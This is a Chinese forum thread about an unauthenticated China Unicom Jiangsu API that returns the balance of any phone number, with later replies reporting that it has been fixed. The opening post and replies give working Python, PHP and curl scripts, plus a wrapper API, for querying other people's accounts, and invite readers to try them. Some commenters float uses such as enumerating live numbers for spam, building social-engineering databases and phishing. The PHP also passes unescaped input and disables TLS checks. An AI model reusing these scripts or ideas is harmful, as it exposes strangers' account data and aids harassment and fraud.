转自吾爱。不知道联通不做鉴权直接开放给公网随意查询是否合适。
python：
import requests
import json
＃ 联通手机号码
phone = "xxxxxxxxxxx"
url = " weixin.10010js.com/app/charge/qryRealFee"
headers = {
"Host": "weixin.10010js.com",
"Content-Type": "application/json",
"Cache-Control": "no-cache",
"Content-Length": "23",
"Accept": "/",
"Referer": " weixin.10010js.com/actPage/activity/index28.html?",
"Accept-Language": "zh-cn",
"User-Agent": "Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; BLA-AL00 Build/HUAWEIBLA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/8.9 Mobile Safari/537.36"
}
data = {
"phone": phone
}
req = requests.post(url, json.dumps(data), headers=headers)
money = int(req.text)/100
print(money)

php：
<?php
$url=" weixin.10010js.com/app/charge/qryRealFee";
$data='{"phone":'.'"'.$_GET["phone"].'"}';
echo "您的帐户余额是:".(curl_post($url,$data)/100)."元人民币";
function curl_post($url,$data){
$headers = array(
"Host:weixin.10010js.com",
"Content-Type:application/json",
"Cache-Control:no-cache",
"Content-Length:23",
"Accept:/",
"Referer: weixin.10010js.com/actPage/activity/index28.html?",
"Accept-Language:zh-cn",
"User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$output = curl_exec($ch);
curl_close($ch);
return $output;
}
?>

有人做好现成的，可以直接试试：
调用地址： api.dooper.top:8899/api/liantong/?nub=
请求方式：GET
返回类型：JSON
请求示例： api.dooper.top:8899/api/liantong/?nub=13288888888

试了下，确实可以直接查到准确的话费余额。
话费余额没有过于敏感的信息，在已知有查话费的 API 的前提下，我更担心有没有类似的可以查身份、姓名、地址等敏感信息的 API，这个 api 不大可能只有这一个业务。

示例号码 80 万话费，擦。。。

这个锅谁来背一下

要是真能爆出来这样的 API，先把那个示例号码查一查，满足下好奇心

联通 app 补卡的时候 输入补办号码后 身份证信息是前端验证的（疑似）

话费也不能公开查啊，很容易伪造成话费不足的钓鱼信息。

应该是微信的 API，被抓了。

2022 年都快来了，居然还见到了只有 http，不支持 https 的接口。

＃8 国企啊！太正常了吧，我相信不止联通公司一架，一定还有！

18666666666 里面有 4 万多余额

那个不是联通的。

两位，看清楚啊，http 是别人封装的

主办单位：中国联合网络通信有限公司江苏省分公司

试了下，其中三个 header 还是必须要有的，所以还是有做少量校验的，你们要求还是太高了。（

PHO=13233233233 \
&& RET=$(curl \
-H "Referer: weixin.10010js.com/actPage/activity/index28.html?" \
-H "Content-Length:23" \
-H "Content-Type:application/json" \
--data "{\"phone\":\"$PHO\"}" \
" weixin.10010js.com/app/charge/qryRealFee" \
-s) && sed -e "s/\(.*\)\(..\)/\1.\2/" <<< $RET | xargs printf "%s" && printf "\x1b[31mRMB\x1b[0m\n"

印象中有一些充值服务的地儿只要输入了手机号就会显示余额，估计是类似接口

配合 surge 做个 shortcut，方便多了

之前联通话费接口还能查到姓的首字母➕名字最后一个字呢

太正常了，联通的业务大部分都是外包出去的，这个只是把话费余额泄露了，前不久连联通最核心的三户信息都暴露出来了。

依然有些涉及暴露隐私，比如先便利一圈，看看那些号是有人用的，然后发 ad 短信或者营销等等。当年生日管家骚扰的接口被我扫了一下，总结出来的风险用途

先持续关注下，后续没问题就自己做没有话费提示接口

话费余额 80 多万把我震惊了... 果然还是贫穷限制了我的想象力，我连开 10 块钱的流量包都要纠结好久 :(

weixin.10010js.com ？

可以做个插件，来电显示对方话费（并没有什么卵用

我信了。

不如在微信上做个 hook，在联系人名字后面加个话费，对于穷的话费都几十几十充就就不用和他聊了😂（开玩笑）

有个朋友想通过姓名查下电话，不知当问不当问

从 API 的命名来看，这个还真的就是只查话费的

应该可以再来一个 alfred workflow 一键查询

能不能把电信移动也撸了？

＃23 应该是去电显示，这样就知道是不是真的停机了（笑

那如果用来轮询，验证号码是否存活不是随随便便事，社工库+1

实测部分号码（也可能是号段原因）无法查询

[{"code":"404","message":"Please check if the number is correct."}]

号码没有问题

貌似修复了 上午还能查到的号码 现在就查不到了

404 了

其实运营商可以弄一个 API 给个人使用，加个密钥就行了，每天限制查询次数也行。

应该是，源 API 关了，显示 404，＃32 是我请求封装后的结果

＃33
果然，404 了

我写了个面向 Surge 的联通查话费 Script

需要的自行使用

github.com/alanhg/surge-config/blob/4ab9d44dbff9270ced701571c78dbca561377f76/query-fee.js

我打少字了。我意思是说：这个应该是抓江苏联通在微信上的小程序或者公众号的 API

原来如此了，404，我估计他们是改了地址，哈哈

修复了